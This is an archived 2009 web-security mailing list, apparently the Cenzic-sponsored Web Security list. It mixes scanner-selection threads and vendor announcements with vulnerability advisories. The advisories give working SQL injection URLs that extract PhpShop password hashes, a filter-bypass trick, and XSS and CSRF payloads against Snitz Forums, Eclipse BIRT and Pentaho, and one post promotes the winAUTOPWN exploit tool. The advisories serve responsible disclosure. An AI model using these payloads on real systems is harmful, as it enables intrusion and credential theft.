Nabble - Web App Security

PhpShop Multiple Vulnerabilities

2009-12-06T12:46:57Z

**************************************************************
Application: PhpShop
Version affected: 0.8.1
Website: http://www.phpshop.org/
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi@...
Web: http://www.andreafabrizi.it
Vuln: Multiple Vulnerabilities
**************************************************************

### SQL INJECTION
http://localhost/phpshop-0.8.1/?page=admin/function_list&module_id=111111'
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
aaa
http://localhost/phpshop-0.8.1/?page=shop/flypage&product_id=1011'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5
-- aaa
http://localhost/phpshop-0.8.1/?page=vendor/vendor_form&vendor_id=1' and '1'='1
http://localhost/phpshop-0.8.1/?page=admin/module_form&module_id=1' and '1'='1
http://localhost/phpshop-0.8.1/?page=admin/user_form&user_id=7322f75cc7ba16db1799fd8d25dbcde4'
and '1'='1
http://localhost/phpshop-0.8.1/?page=vendor/vendor_category_form&vendor_category_id=6'
and '1'='1
http://localhost/phpshop-0.8.1/?page=store/user_form&user_id=c88ce1c0ad365513d6fe085a8aacaebc'
and '1'='1
http://localhost/phpshop-0.8.1/?page=store/payment_method_form&payment_method_id=1'
and '1'='1
http://localhost/phpshop-0.8.1/?page=tax/tax_form&tax_rate_id=2' and '1'='1
...and many others...

The SQL Injection security check can be bypassed replacing spaces with
comments (/**/)

### BLIND SQL INJECTION
http://localhost/phpshop-0.8.1/?page=shop/browse&category=aaa' and 1=1 -- aaa

### CSRF
http://localhost/phpshop-0.8.1/?page=shop/cart&func=cartAdd&product_id=321&
...and many others...

### XSS
http://localhost/phpshop-0.8.1/?page=order/order_print&order_id=1"><script>alert(document.cookie);</script>
...and many others...

This list is sponsored by Cenzic
--------------------------------------
Let Us Hack You. Before Hackers Do!
It's Finally Here - The Cenzic Website HealthCheck. FREE.
Request Yours Now!
http://www.cenzic.com/2009HClaunch_Securityfocus
--------------------------------------

PhpShop Multiple Vulnerabilities

2009-12-05T10:46:21Z

Re: out of box scanner

2009-11-30T22:22:57Z

Rapid 7 is better, nothing stored off site.

Best Regards,

Lawrence Pingree

On Nov 30, 2009, at 9:52 PM, Erik Ilves <green.boy@...> wrote:

Hey John,

I haven't evaluated myself because i love my nessus scanner, but I've heard good things about http://www.qualys.com/

B r,

Erik

On 25.11.2009 18:15, John Bennett wrote:
I'm currently evaluating some commercial scanners and wanted to get a feel for others experiences with appscan/cenzic/webinspect. Any gotcha's with any of these products and can anybody recommend one over the other?
thanks,
John

This list is sponsored by Cenzic
--------------------------------------
Let Us Hack You. Before Hackers Do!
It's Finally Here - The Cenzic Website HealthCheck. FREE.
Request Yours Now! http://www.cenzic.com/2009HClaunch_Securityfocus
--------------------------------------

This list is sponsored by Cenzic
--------------------------------------
Let Us Hack You. Before Hackers Do!
It's Finally Here - The Cenzic Website HealthCheck. FREE.
Request Yours Now! http://www.cenzic.com/2009HClaunch_Securityfocus
--------------------------------------

This list is sponsored by Cenzic
--------------------------------------
Let Us Hack You. Before Hackers Do!
It's Finally Here - The Cenzic Website HealthCheck. FREE.
Request Yours Now!
http://www.cenzic.com/2009HClaunch_Securityfocus
--------------------------------------

Re: out of box scanner

2009-11-30T21:52:11Z

Hey John,

I haven't evaluated myself because i love my nessus scanner, but I've
heard good things about http://www.qualys.com/

B r,

Erik

On 25.11.2009 18:15, John Bennett wrote:

> I'm currently evaluating some commercial scanners and wanted to get a
> feel for others experiences with appscan/cenzic/webinspect. Any
> gotcha's with any of these products and can anybody recommend one over
> the other?
> thanks,
> John
>
>
>
> This list is sponsored by Cenzic
> --------------------------------------
> Let Us Hack You. Before Hackers Do!
> It's Finally Here - The Cenzic Website HealthCheck. FREE.
> Request Yours Now! http://www.cenzic.com/2009HClaunch_Securityfocus
> --------------------------------------
>
>

This list is sponsored by Cenzic
--------------------------------------
Let Us Hack You. Before Hackers Do!
It's Finally Here - The Cenzic Website HealthCheck. FREE.
Request Yours Now!
http://www.cenzic.com/2009HClaunch_Securityfocus
--------------------------------------

Re: Complex applications security testing framework

2009-11-29T10:48:30Z

Hello, chr1x!

Thank you for your reply.

Sure, SANS Top25 is not a good example, but CWE classification at
least gives us some structure.

Fuzzing is only one method among others (e.g. code review, developers
interviewing, security logic testing, etc.) used in vulnerability
discovery and usually is applied when source code is not available.
How do I have to test, for example, simple FTP server (with source
code available) to provide comprehensive result? Is there, like, any
public "checklist" where I can fill ticks in?

Again, for web applications it's all clear: OWASP Testing Guide, OWASP
Top10, etc.
For some particular applications there are industry standards - e.g.
J2ME app implementing MMA auth in cell phone falls under "MasterCard
Best Practice for MMA applications". But AFAIK there is no common and
comprehensive framework for application testing.

Maybe I'm missing smth, but ISSAF is all about penetration tests, not
application assessment. It contains only one small section called
"APPLICATION SECURITY EVALUATION CHECKLIST" and I can hardly call it
"comprehensive". Compare it, for example, with PCI PA-DSS [0].

[0] https://www.pcisecuritystandards.org/security_standards/pci_pa_dss.shtml

2009/11/29 chr1x <chr1x@...>:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Hello Marat,
>
>
> Looking around the links that you posted, in this case, talking about
> the SANS Top25, mostly of those are related to Web, at least, the
> concept, for example: CWE-285: Improper Access Control
> (Authorization). I'm not sure exactly what you mean by assessing
> complex apps in a non-scripting language. I figured out that some apps
> that applies to your question it's more focused on RE / Vulnerability
> discovery tasks, like for example an ftp server in which you could
> perform security assessment with Fuzzing apps like TAOF (The Art of
> Fuzzing) which looks for Stack/Heap/String/Integer overflows, at the
> end in this case, you are doing "security" based testing.
>
> I know that one of the best testing guidelines for non-web apps is the
> ISSAF [www.oissg.org/issaf] which I highly recommend you to take a look.
>
> Hope I cleared your doubt.
>
> chr1x **
>
> - --
> - ---
> [CubilFelino Security Research Lab - http://chr1x.sectester.net ]
> "The computer security is an art form. It's the ultimate martial art."
>
>
> Marat VYSHEGORODTSEV escribió:
>> Hello, web security researchers!
>>
>> There is well known methodology for auditing security of web
>> applications called OWASP Testing Guide [0], but it describes testing
>> procedures for only web applications, not for, like, complex
>> applications (for example, containing application servers, application
>> gateways and so on) usually written in C#, C++, Delphi or any other
>> non-scripting language. Would you, folks, recommend such a framework
>> for testing complex not-web-only-applications?
>>
>> I know only one approach from SANS [1] (Top25, CWE classification and
>> risk assessment), but it doesn't provide comprehensive methodology
>> like OWASP does. Basically I want to fill a gap between risk and
>> vulnerability assessment jobs and I'm looking for generally recognized
>> approach.
>>
>> [0] http://www.owasp.org/index.php/Category:OWASP_Testing_Project
>> [1] http://www.sans.org/top25-programming-errors/
>>
>> Sincerely, Marat Vyshegorodtsev
>> Assessment specialist
>>
>>
>>
>> This list is sponsored by Cenzic
>> --------------------------------------
>> Let Us Hack You. Before Hackers Do!
>> It's Finally Here - The Cenzic Website HealthCheck. FREE.
>> Request Yours Now!
>> http://www.cenzic.com/2009HClaunch_Securityfocus
>> --------------------------------------
>>
>>
>>
>
>
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.9 (MingW32)
> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
>
> iQEcBAEBAgAGBQJLEp0IAAoJEENUkd83ZfT49lgH/1TcCdJEzeAjhRcRXrV233gT
> 139XqC5sJw/n4FtVLvxBGtCPO4ZZlo5MHET+fumyVJ6plhHX/H81LTl+XJGh8h+s
> 8bN4lwL9zNGUayG2Rfjveme8Kj8uo3PLfQeyFyIsQKCqckw8oxepNTJKmDgKAJT+
> n2gxprxzGPOX8joW0h9asoXLE1sa9ad5whThukcgRYU8FTMyYoA4q3Nlg02MUNwH
> oEgX2qSamrL4Uo091yztg3ug4NUd4Ox/1YymgvStpn4zB5aZbwbaQNnkBxf/Zcgl
> Po0PdcMYLBj5CTIOsXQ0PO/AWpvKwjpEcW2JYZxhaCsnxcKn6QvSgSCZV17PK3s=
> =lKzV
> -----END PGP SIGNATURE-----
>
>

--
Marat Vyshegorodtsev

This list is sponsored by Cenzic
--------------------------------------
Let Us Hack You. Before Hackers Do!
It's Finally Here - The Cenzic Website HealthCheck. FREE.
Request Yours Now!
http://www.cenzic.com/2009HClaunch_Securityfocus
--------------------------------------

Re: Complex applications security testing framework

2009-11-29T08:10:49Z

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello Marat,

Looking around the links that you posted, in this case, talking about
the SANS Top25, mostly of those are related to Web, at least, the
concept, for example: CWE-285: Improper Access Control
(Authorization). I'm not sure exactly what you mean by assessing
complex apps in a non-scripting language. I figured out that some apps
that applies to your question it's more focused on RE / Vulnerability
discovery tasks, like for example an ftp server in which you could
perform security assessment with Fuzzing apps like TAOF (The Art of
Fuzzing) which looks for Stack/Heap/String/Integer overflows, at the
end in this case, you are doing "security" based testing.

I know that one of the best testing guidelines for non-web apps is the
ISSAF [www.oissg.org/issaf] which I highly recommend you to take a look.

Hope I cleared your doubt.

chr1x **

- --
- ---
[CubilFelino Security Research Lab - http://chr1x.sectester.net ]
"The computer security is an art form. It's the ultimate martial art."

Marat VYSHEGORODTSEV escribió:

> Hello, web security researchers!
>
> There is well known methodology for auditing security of web
> applications called OWASP Testing Guide [0], but it describes testing
> procedures for only web applications, not for, like, complex
> applications (for example, containing application servers, application
> gateways and so on) usually written in C#, C++, Delphi or any other
> non-scripting language. Would you, folks, recommend such a framework
> for testing complex not-web-only-applications?
>
> I know only one approach from SANS [1] (Top25, CWE classification and
> risk assessment), but it doesn't provide comprehensive methodology
> like OWASP does. Basically I want to fill a gap between risk and
> vulnerability assessment jobs and I'm looking for generally recognized
> approach.
>
> [0] http://www.owasp.org/index.php/Category:OWASP_Testing_Project
> [1] http://www.sans.org/top25-programming-errors/
>
> Sincerely, Marat Vyshegorodtsev
> Assessment specialist
>
>
>
> This list is sponsored by Cenzic
> --------------------------------------
> Let Us Hack You. Before Hackers Do!
> It's Finally Here - The Cenzic Website HealthCheck. FREE.
> Request Yours Now!
> http://www.cenzic.com/2009HClaunch_Securityfocus
> --------------------------------------
>
>
>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQEcBAEBAgAGBQJLEp0IAAoJEENUkd83ZfT49lgH/1TcCdJEzeAjhRcRXrV233gT
139XqC5sJw/n4FtVLvxBGtCPO4ZZlo5MHET+fumyVJ6plhHX/H81LTl+XJGh8h+s
8bN4lwL9zNGUayG2Rfjveme8Kj8uo3PLfQeyFyIsQKCqckw8oxepNTJKmDgKAJT+
n2gxprxzGPOX8joW0h9asoXLE1sa9ad5whThukcgRYU8FTMyYoA4q3Nlg02MUNwH
oEgX2qSamrL4Uo091yztg3ug4NUd4Ox/1YymgvStpn4zB5aZbwbaQNnkBxf/Zcgl
Po0PdcMYLBj5CTIOsXQ0PO/AWpvKwjpEcW2JYZxhaCsnxcKn6QvSgSCZV17PK3s=
=lKzV
-----END PGP SIGNATURE-----

This list is sponsored by Cenzic
--------------------------------------
Let Us Hack You. Before Hackers Do!
It's Finally Here - The Cenzic Website HealthCheck. FREE.
Request Yours Now!
http://www.cenzic.com/2009HClaunch_Securityfocus
--------------------------------------

Complex applications security testing framework

2009-11-28T13:47:19Z

Hello, web security researchers!

There is well known methodology for auditing security of web
applications called OWASP Testing Guide [0], but it describes testing
procedures for only web applications, not for, like, complex
applications (for example, containing application servers, application
gateways and so on) usually written in C#, C++, Delphi or any other
non-scripting language. Would you, folks, recommend such a framework
for testing complex not-web-only-applications?

I know only one approach from SANS [1] (Top25, CWE classification and
risk assessment), but it doesn't provide comprehensive methodology
like OWASP does. Basically I want to fill a gap between risk and
vulnerability assessment jobs and I'm looking for generally recognized
approach.

[0] http://www.owasp.org/index.php/Category:OWASP_Testing_Project
[1] http://www.sans.org/top25-programming-errors/

Sincerely, Marat Vyshegorodtsev
Assessment specialist

This list is sponsored by Cenzic
--------------------------------------
Let Us Hack You. Before Hackers Do!
It's Finally Here - The Cenzic Website HealthCheck. FREE.
Request Yours Now!
http://www.cenzic.com/2009HClaunch_Securityfocus
--------------------------------------

Re: out of box scanner

2009-11-26T09:17:21Z

The Web Application Security Scanner Evaluation Criteria provides
guidance on features that should be considered when evaluating scanners
and advice on conducting an evaluation. I agree with Jon that obtaining
evaluation licenses for these scanners and running them against a sample
of your actual web applications will give you the best idea of which
product best meets your needs.

http://projects.webappsec.org/Web-Application-Security-Scanner-Evaluation-Criteria

Brian

Jon Kibler wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> John Bennett wrote:
>
>> I'm currently evaluating some commercial scanners and wanted to get a
>> feel for others experiences with appscan/cenzic/webinspect. Any
>> gotcha's with any of these products and can anybody recommend one over
>> the other?
>> thanks,
>> John
>>
>>
>
> Do a fly-off in your environment. Each will give you 15-day demos. Run the demos
> concurrently so that you can compare and contrast results. If a scanner vastly
> under-preforms one of the competitors, contact their tech reps because you most
> likely have something misconfigured.
>
> Pick the scanner that finds the most non-false positives that the other scanners
> miss, has the least false negatives, best fits your working environment, and
> best integrates with other tools that you may be using.
>
> In two recent fly-offs with my clients, one vendor has consistently
> out-performed the competition -- and I was stunned to have found that was the
> case -- but, I do not want to prejudice your opinions by saying who. However, I
> would be interested in hearing who you choose and why.
>
> Best wishes,
>
> Jon Kibler
> - --
> Jon R. Kibler
> Chief Technical Officer
> Advanced Systems Engineering Technology, Inc.
> Charleston, SC USA
> o: 843-849-8214
> c: 843-813-2924
> s: 843-564-4224
> s: JonRKibler
> e: Jon.Kibler@...
> e: Jon.R.Kibler@...
> http://www.linkedin.com/in/jonrkibler
>
> My PGP Fingerprint is:
> BAA2 1F2C 5543 5D25 4636 A392 515C 5045 CF39 4253
>
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.8 (Darwin)
> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
>
> iEYEARECAAYFAksOQU4ACgkQUVxQRc85QlM3DQCfZR9ciYZnxhMR6ANMDxr4MTi6
> X90Anje4KqXYrD6TFL6JlTK2B8NyLHHv
> =lvjN
> -----END PGP SIGNATURE-----
>
>
>
> This list is sponsored by Cenzic
> --------------------------------------
> Let Us Hack You. Before Hackers Do!
> It's Finally Here - The Cenzic Website HealthCheck. FREE.
> Request Yours Now!
> http://www.cenzic.com/2009HClaunch_Securityfocus
> --------------------------------------
>
>
>

Re: out of box scanner

2009-11-26T00:50:23Z

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

John Bennett wrote:
> I'm currently evaluating some commercial scanners and wanted to get a
> feel for others experiences with appscan/cenzic/webinspect. Any
> gotcha's with any of these products and can anybody recommend one over
> the other?
> thanks,
> John
>

Do a fly-off in your environment. Each will give you 15-day demos. Run the demos
concurrently so that you can compare and contrast results. If a scanner vastly
under-preforms one of the competitors, contact their tech reps because you most
likely have something misconfigured.

Pick the scanner that finds the most non-false positives that the other scanners
miss, has the least false negatives, best fits your working environment, and
best integrates with other tools that you may be using.

In two recent fly-offs with my clients, one vendor has consistently
out-performed the competition -- and I was stunned to have found that was the
case -- but, I do not want to prejudice your opinions by saying who. However, I
would be interested in hearing who you choose and why.

Best wishes,

Jon Kibler
- --
Jon R. Kibler
Chief Technical Officer
Advanced Systems Engineering Technology, Inc.
Charleston, SC USA
o: 843-849-8214
c: 843-813-2924
s: 843-564-4224
s: JonRKibler
e: Jon.Kibler@...
e: Jon.R.Kibler@...
http://www.linkedin.com/in/jonrkibler

My PGP Fingerprint is:
BAA2 1F2C 5543 5D25 4636 A392 515C 5045 CF39 4253

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAksOQU4ACgkQUVxQRc85QlM3DQCfZR9ciYZnxhMR6ANMDxr4MTi6
X90Anje4KqXYrD6TFL6JlTK2B8NyLHHv
=lvjN
-----END PGP SIGNATURE-----

This list is sponsored by Cenzic
--------------------------------------
Let Us Hack You. Before Hackers Do!
It's Finally Here - The Cenzic Website HealthCheck. FREE.
Request Yours Now!
http://www.cenzic.com/2009HClaunch_Securityfocus
--------------------------------------

out of box scanner

2009-11-25T08:15:27Z

I'm currently evaluating some commercial scanners and wanted to get a
feel for others experiences with appscan/cenzic/webinspect. Any
gotcha's with any of these products and can anybody recommend one over
the other?

thanks,
John

This list is sponsored by Cenzic
--------------------------------------
Let Us Hack You. Before Hackers Do!
It's Finally Here - The Cenzic Website HealthCheck. FREE.
Request Yours Now!
http://www.cenzic.com/2009HClaunch_Securityfocus
--------------------------------------

Replicating the Gonzalez Cyber Attacks through Penetration Testing

2009-11-20T16:07:11Z

--------------------------------------------------------------------------------
YOU'RE INVITED: IT SECURITY ON DEMAND WEBCAST

"Replicating the Gonzalez Cyber Attacks through Penetration Testing"
Register: http://www.coresecurity.com/Form/generic/campaign/SecurityFocusGonzalez
---------------------------------------------------------------------------------

Recently, we saw the indictment of cybercrime kingpin Albert Gonzalez, one of the accused masterminds behind high-profile data breaches at Heartland Payment Systems, Hannaford Bros. Supermarkets, 7-Eleven, and TJX. Next week, Core Security Technologies will present a hands-on look at the attacks Gonzalez and his co-conspirators are believed to have used in breaching these organizations.

Leveraging the actual indictment document as a guide, Core Security senior product manager Alex Horan will use CORE IMPACT Pro penetration testing software to demonstrate the techniques by which Gonzales allegedly stole millions of credit card numbers* - showing you how to identify IT exposures in your own environment before cybercriminals do.

> Register here: http://www.coresecurity.com/Form/generic/campaign/SecurityFocusGonzalez

During the webcast, you'll see a step-by-step depiction of an attack similar to that described in the Gonzalez indictment, including the following critical stages:

* the initial web application compromise via SQL Injection
* the use of a well-known backend database command to make the attacks even
* more invasive
* the planting of malware on the backend database server
* the collection and transmission of credit card transactions to the
* attackers

Through the demonstration, you'll also learn how commercial-grade penetration testing software enables you to see your IT systems as an attacker would -- not only by determining if the kinds of issues that Gonzalez reportedly leveraged are present in your environment, but also by ...

* assessing how deployed defenses react to specific threats
* revealing what systems and data would be exposed by a breach
* depicting how chains of vulnerabilities open paths to mission-critical
* systems and information
* providing actionable data for immediately mitigating critical exposures
* repeating tests to ensure the effectiveness of remediation efforts

This webcast is ideal for anyone interested in proactively assessing their security posture against real-world cyber threats.

> Register here: http://www.coresecurity.com/Form/generic/campaign/SecurityFocusGonzalez

This list is sponsored by Cenzic
--------------------------------------
Let Us Hack You. Before Hackers Do!
It's Finally Here - The Cenzic Website HealthCheck. FREE.
Request Yours Now!
http://www.cenzic.com/2009HClaunch_Securityfocus
--------------------------------------

winAUTOPWN 2.0 - Introducing winAUTOPWN GUI - Now you can sleep

2009-11-03T10:02:59Z

Dear all,

After a long break and a lot of Unpolished SITA releases of the previous version,
I am finally releasing winAUTOPWN version 2.0

winAUTOPWN or WINDOWS AUTOPWN version 2.0 now has a GUI (winAUTOPWN_GUI.exe) to initiate the main
console winAUTOPWN.exe
winAUTOPWN now supports all console arguments which can also be fed interactively.
This version covers almost all remote exploits from 2009 start uptill October 2009. Though a few are still missing
but they will be added shortly.

Daily/Weekly Snapshot/Beta Releases of winAUTOPWN are always available for download from WINAUTOPWN
website

DOWNLOAD LINK : http://089dc64a.seriousfiles.com

Enjoy the Release.

The Latest available release now is winAUTOPWN version 2.0

Coded by : Azim Poonawala (QUAKERDOOMER)

winAUTOPWN available at http://winautopwn.co.nr

Author's website : http://solidmecca.co.nr

winAUTOPWN is updated almost daily. Check the Download page for weekly
snapshots.
Latest Release can always be downloaded from : http://winautopwn.co.nr

"winAUTOPWN - WINDOWS AUTOPWN (For The True HyperSomniac H-a-c-k-e-r-z-
z-z-z-Z-Z)"

Regards,
QUAKERDOOMER

WASC Announcement: 2008 Web Application Security Statistics Published

2009-10-16T10:50:23Z

The Web Application Security Consortium (WASC) is pleased to announce
the WASC Web Application Security Statistics Project 2008. This
initiative is a collaborative industry wide effort to pool together
sanitized website vulnerability data and to gain a better understanding
about the web application vulnerability landscape.

The statistics was compiled from web application security assessment
projects which were made by the following companies in 2008 (in
alphabetic order):

* Blueinfy
* Cenzic with Hailstorm
* DNS with WebInspect
* Encription Limited
* HP Application Security Center with WebInspect
* Positive Technologies with MaxPatrol
* Veracode with Veracode Security Review
* WhiteHat Security with WhiteHat Sentinel

The statistics includes data about 12186 sites with 97554 detected
vulnerabilities.

http://projects.webappsec.org/Web-Application-Security-Statistics

If you represent an organization that performs vulnerability assessments
on websites, particular in those in custom web applications, through a
manual or automated process and would like to participate please let us
know. Please contact Sergey Gordeychik (gordey_at_ptsecurity.com).

Regards,
- Sergey Gordeychik
http://www.webappsec.org/ The Web Application Security Consortium

----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA

Snitz Forums 2000 Multiple Cross-Site Scripting Vulnerabilities

2009-10-15T08:50:10Z

**************************************************************
Application: Snitz Forums 2000
Version affected: 3.4.07
Website: http://forum.snitz.com/
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi@...
Web: http://www.andreafabrizi.it
Vuln: Multiple Cross-Site Scripting
**************************************************************

###### PERMANENT XSS
If [sound] tag is allowed:

[sound]http://url_to_valid_mp3_or_m3u_file.m3u"
onLoad="alert(document.cookie)[/sound]
######

###### LINK XSS
http://localhost/forum/pop_send_to_friend.asp?url=</textarea><img
src="http://www.google.it/intl/it_it/images/logo.gif" onLoad
="alert(document.cookie)">

Note the space: onLoad<space>="alert(document.cookie)"
######

--
Andrea Fabrizi
http://www.andreafabrizi.it

[AntiSnatchOr] Eclipse BIRT <= 2.2.1 Reflected XSS

2009-10-13T16:53:39Z

Eclipse BIRT <= 2.2.1 Reflected XSS

Vendor: Eclipse
Advisory: http://antisnatchor.com/2008/12/18/eclipse-birt-reflected-xss/
Author: Michele "euronymous" Orrù (euronymous AT antisnatchor DOT com)

Quite a common problem in a lot of Java based applications: reflected
XSS in Java stack trace.

A Reflected XSS is present in the _report parameter: here below the modified
request (that is the BIRT 2.2.1 version included in Konakart 2.2.6)

GET
/birt-viewer/run?__report='"><iframe%20src=javascript:alert(666)>&r=-703171660
HTTP/1.1
Host: localhost:8780
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18)
Gecko/20081029 Firefox/2.0.0.18
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://localhost:8780/konakartadmin/

Konakart is actually using org.eclipse.birt.core_2.2.1.r22x_v20070924, that is
actually old.

- Disclosure timeline:
2008-12-17 11:04:15 EST : Vendor Contacted
2009-02-11 03:39:09 EST: Bug fix
2009-03-09 05:32:42 EDT: Patches verified on 2.5.0

- CREDITS

Michele "euronymous" Orru'

- LEGAL NOTICES

Copyright (c) 2009 Michele "euronymous" Orru'

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

[AntiSnatchOr] Pentaho Bi-server multiple vulnerabilities

2009-10-13T16:42:45Z

Pentaho 1.7.0.1062 Multiple Vulnerabilities

Name Multiple Vulnerabilities in Pentaho
Systems Affected Pentaho <= 1.7.0.1062
Severity High
Impact (CVSSv2) High 7/10, vector: (AV:N/AC:L/Au:S/C:P/I:C/A:P)
Vendor http://www.pentaho.com
Advisory http://antisnatchor.com/2009/06/20/pentaho-1701062-multiple-vulnerabilities/
Authors Michele "euronymous" Orrù (euronymous AT antisnatchor DOT com)

Date 20081224

I. BACKGROUND
Pentaho Analysis puts rich, analytic power in the hands of your business users
helping them gain the insights and understanding they need to make optimal
business decisions.

II. DESCRIPTION

Multiple vulnerabilities exist in Pentaho .

III. ANALYSIS

Summary:

A) Reflected XSS
B) Password field with autocomplete enabled
C) Disclosure of Session Tokens in URL

A) Reflected XSS

The presence of the Cross Site Scripting plague has been veryfied on
/pentaho/ViewAction parameters. The attacker-supplied code can perform
different actions, such as stealing the victim's session token or
login credentials,
performing arbitrary actions on the victim's behalf, and logging their
keystrokes.
Users can be induced to issue the attacker's crafted request in various ways.
For example, an attacker can send to the victim a link containing a
malicious URL in
an email or instant message, instead of submit the link to popular web
applications
that don't escape HTML characters such as <>'\().

An example is the following:

GET /pentaho/ViewAction?&
outputType=khgj345<script>alert('Pwnd')</script>kjh3535
&solution=opentaps&action=CustomerLifeTimeOrders.xaction&path=Customer%20Analysis
HTTP/1.0
User-Agent: Opera/9.63 (Windows NT 5.1; U; en) Presto/2.1.1
Host: demo1.opentaps.org:8181
Accept: text/html, application/xml;q=0.9, application/xhtml+xml,
image/png, image/jpeg,
image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: it-IT,it;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Referer: http://demo1.opentaps.org:8181/pentaho/ViewAction?solution=opentaps&path=
Customer%20Analysis&action=CustomerLifeTimeOrders.xaction
Cookie: JSESSIONID=85740C182994F78946BE8A38605396B1
Cookie2: $Version=1
Proxy-Connection: Keep-Alive

When the request will be executed, a popup showing the string Pwnd can be seen.
Here the response:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.1.GA (build: SVNTag=JBoss_4_2_1_GA
date=200707131605)/Tomcat-5.5
content-disposition: inline;filename=Customer_Lifetime_Orders.html
Content-Type: text/html;charset=UTF-8
Content-Length: 1615
Date: Wed, 24 Dec 2008 09:55:32 GMT
Connection: close

<html><head><title>Pentaho BI Platform - Error in Action</title><link
rel="stylesheet"
type="text/css" href="/pentaho-style/active/default.css"></head><body
dir="LTR"><table
cellspacing="10"><tr><td class="portlet-section" colspan="3">Failed<hr
size="1"/></td>
</tr><tr><td class="portlet-font" valign="top"><span style="color:red">
Errore: SecureFilterComponent.ERROR_0001 -
"khgj345<script>alert('Pwnd')</script>kjh3535"
non Ã¨ una selezione consentita "outputType" per questo utente
(org.pentaho.plugin.core.SecureFilterComponent)</span><p/>Debug:
Partenza dellesecuzione di
{0}/{1}/{2} (org.pentaho.core.solution.SolutionEngine)<br/>Debug:
Lettura del contesto a
runtime e dei dati
(org.pentaho.core.solution.SolutionEngine)<br/>Debug: Caricamento del
file di configurazione dell'Action Sequence
(org.pentaho.core.solution.SolutionEngine)<br/>
Debug: Audit: instanceId=0113b013-d1a1-11dd-a254-65c8cd8ab409,
objectId=org.pentaho.core.runtime.RuntimeContext,
messageType=action_sequence_start
(org.pentaho.core.runtime.RuntimeContext)<br/>Errore:
SecureFilterComponent.ERROR_0001
- "khgj345<script>alert('Pwnd')</script>kjh3535" non Ã¨ una selezione
consentita "outputType"
per questo utente (org.pentaho.plugin.core.SecureFilterComponent)<br/>Errore:
RuntimeContext.ERROR_0012 - LActionDefinition per {0} non Ã¨ stata
eseguita con successo
(org.pentaho.core.runtime.RuntimeContext)<br/>Errore:
SolutionEngine.ERROR_0007 -
Esecuzione dell'Action Sequence fallita
(org.pentaho.core.solution.SolutionEngine)<br/></td>
</tr></table><p> [it_41] Server Version Pentaho BI Platform
1.7.0.1062</body></html>

The same servlet, /pentaho/ViewAction, contains other two parameters
that are vulnerable to reflected
XSS: "action" and "path" (that are exploitable in the same way).

B) Password field with autocomplete enabled

The response to this request:

GET /pentaho/Login;jsessionid=857E0C182994F71355BE8A3860539BH7

contains the login form where credentials are passed to the application.
[...]
<tr>
<td colspan="2"><input type='password' name='j_password' size="30" ></td>
</tr>
[...]

The problem is that the autocomplete tag is not set to OFF. We recommend it,
especially for the presence of reflected XSS that in this situation
can be exploited
to retrieve the password input from the browser history.

C) Disclosure of Session Tokens in URL
The web application session identifier, JSESSIONID, is disclosed in the URL:
that's a bad practice because these sensitive informations will be visible
in the client browser history, in the Referer header, in bookmarks.

An example:
http://demo1.opentaps.org:8181/pentaho/Login;jsessionid=857E0C18
2994F71355BE8A38605396B1

IV. DETECTION

1.7.0.1062 and earlier versions are vulnerable.

V. WORKAROUND

Proper input validation and session management will fix the vulnerabilities.

VI. VENDOR RESPONSE

No fix available.

VII. CVE INFORMATION

No CVE at this time.

VIII. DISCLOSURE TIMELINE

20081224 Initial vendor contact
20081229 Second vendor contact
20090120 Bugs have been assigned to developers
20090619 Bugs have been finally fixed

IX. CREDIT

Michele "euronymous" Orru'

X. LEGAL NOTICES

Copyright (c) 2008 Michele "euronymous" Orru'

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

[BONSAI] XSS in Achievo - Customized XSS payload included

2009-10-13T07:01:10Z

Bonsai Information Security - Advisory
http://www.bonsai-sec.com/research/

Multiple XSS in Achievo

